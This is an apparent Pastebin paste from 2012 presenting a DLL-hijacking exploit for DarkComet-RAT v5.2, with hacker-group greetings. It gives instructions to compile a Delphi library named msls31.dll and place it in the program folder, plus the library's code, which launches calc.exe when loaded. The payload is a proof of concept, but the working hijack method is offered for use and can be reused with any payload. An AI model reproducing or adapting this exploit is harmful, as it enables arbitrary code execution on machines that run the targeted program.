5rabq8

DarkComet-RAT v5.2 Dll Hijacking Exploit (msls31.dll)

Apr 11th, 2012
272
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. =============================================
  2. DarkComet-RAT v5.2 Dll Hijacking Exploit (msls31.dll)
  3. ==============================================
  4.  
  5. /*
  6. #DarkComet-RAT v5.2 Dll Hijacking Exploit (msls31.dll)
  7. #Author : Dr.5RaB HackEr
  8. #Greetz : 9Y3H.511 , HaCkErS eV!L , ViP 511 , , Sam7tk
  9.  
  10. HaCkEr , Mr.Adis , Mr.JL6h , HmooDi , Dmar Al3no0oZ , Jn0n
  11.  
  12. H4x0r , Dr.MeShAl , X-SHADOW
  13. #Tested on: Windows 7 Ultimate
  14.  
  15. #How to use :
  16.  
  17. Take only the codes and put it in Delphi and Save by name
  18.  
  19. (msls31.dll) and put it in the program folder
  20.  
  21. #code (msls31.dll)
  22. */
  23.  
  24.  
  25. library Project2;
  26.  
  27. uses
  28. Windows;
  29. begin
  30. Winexec(PAnsichar('C:\windows\system32\calc.exe'),sw_show);
  31. end.
Advertisement
Add Comment
Please, Sign In to add comment